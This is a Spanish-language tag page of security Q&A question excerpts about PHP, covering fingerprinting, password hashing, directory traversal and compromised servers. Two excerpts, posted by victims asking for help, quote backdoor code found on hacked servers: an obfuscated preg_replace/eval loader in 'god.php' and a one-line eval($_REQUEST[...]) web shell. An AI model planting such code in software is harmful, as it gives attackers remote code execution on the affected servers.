Preguntas con etiqueta 'php'

preguntas con etiqueta
1
respuesta

Cómo whoer.net puede obtener el sistema operativo y el módem de TCP / IP y su versión

Al ejecutar la prueba en enlace En la sección de SO, columna TCP / IP, obtengo el núcleo de Windows NT [genérico] (Ethernet o módem, MTU: 1500) La pregunta sería cómo lo hacen y ¿es posible falsificarlo? Más importante aún, ¿esto suce...
hecha 15.02.2018 - 12:31
1
respuesta

Obtención de una detección de PHISH / Zmate.omna por Avira cuando actualizo mi página, pero los escáneres de sitios web en línea muestran que la página está limpia

Cuando Avira actualizo mi página, obtengo una detección de PHISH / Zmate.omna que muestra que se colocó en el caché de Chrome. Pero probé varios escáneres de url / sitios web en línea, y todos muestran que la página está limpia. ¿Es un falso...
hecha 26.01.2018 - 07:43
1
respuesta

PHP: ¿Password_hash / Argon2i trunca efectivamente las contraseñas después de cierta longitud?

Si no estoy equivocado, de forma predeterminada, password_hash con PASSWORD_ARGON2I de PHP genera un hash alfanumérico de 43 caracteres, entre otras cosas. Si bien esto significa que las contraseñas simples que tienen menos de 43 c...
hecha 25.03.2018 - 19:14
1
respuesta

PHP Backdoor en el servidor en vivo [duplicado]

De repente, uno de nuestros sitios web de Wordpress comenzó a enviar correos electrónicos no deseados y se incluyó en la lista negra de MXToolBox. Así que con el soporte del servidor, exploré los archivos y encontré un archivo extraño llamado...
hecha 02.01.2018 - 05:43
1
respuesta

¿Detener el ataque del directorio transversal con .htaccess?

¿Es posible configurar .htaccess para bloquear las solicitudes de PHP para acceder a los elementos que se encuentran encima de la carpeta raíz? diga que un script malicioso se coloca en una carpeta y puede solicitar acceso a "../../../../conf...
hecha 23.11.2017 - 16:57
1
respuesta

Array en las solicitudes HTTP GET / POST

En la programación del servidor PHP, las solicitudes GET / POST codificadas en URL se analizan en el tipo asociativo "array" al recibirlas. Durante la mayor parte del tiempo, se puede suponer que los argumentos de consulta son cadenas, sin embar...
hecha 22.02.2018 - 02:29
1
respuesta

Tratando de hacer una solicitud de publicación multiparte fragmentada, nginx y php ambos devuelven un error 400

Estoy tratando de usar un protocolo fragmentado y un protocolo multiparte en una solicitud POST, como esta Todos los símbolos de nueva línea son \r\n , por ejemplo, POST http://127.0.0.1/print.php?a=1&b=2 HTTP/1.1 accept-language:...
hecha 05.10.2017 - 08:19
1
respuesta

¿Es esto una especie de ataque de hackers?

Estoy usando una herramienta en mi sitio web que detecta cualquier error y me envía un correo electrónico cuando ocurre un error de código. Recientemente, recibí algunas solicitudes no permitidas en mi IP , no url - donde solo se permite GET....
hecha 11.10.2017 - 09:29
1
respuesta

Archivo PHP extraño encontrado en el servidor web [duplicado]

He encontrado un archivo PHP muy extraño con una expresión regular muy larga en el servidor web de un cliente. El archivo se llama 'god.php', y este es su contenido: <?php preg_replace("/.*/e", "\x28\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x...
hecha 24.07.2017 - 16:14
3
respuestas

¿Cómo puedo determinar de dónde provino el script inyectado?

Tengo un servidor que actualmente ha sido hackeado. Se están creando archivos en mi servidor que tiene contenido de este tipo: if(isset($_REQUEST['oUS'])){/*PJEG*/eval($_REQUEST['oUS']);/*z*/exit;/*Lv*/} O como esto: <?php /*auV*...
hecha 20.07.2017 - 11:25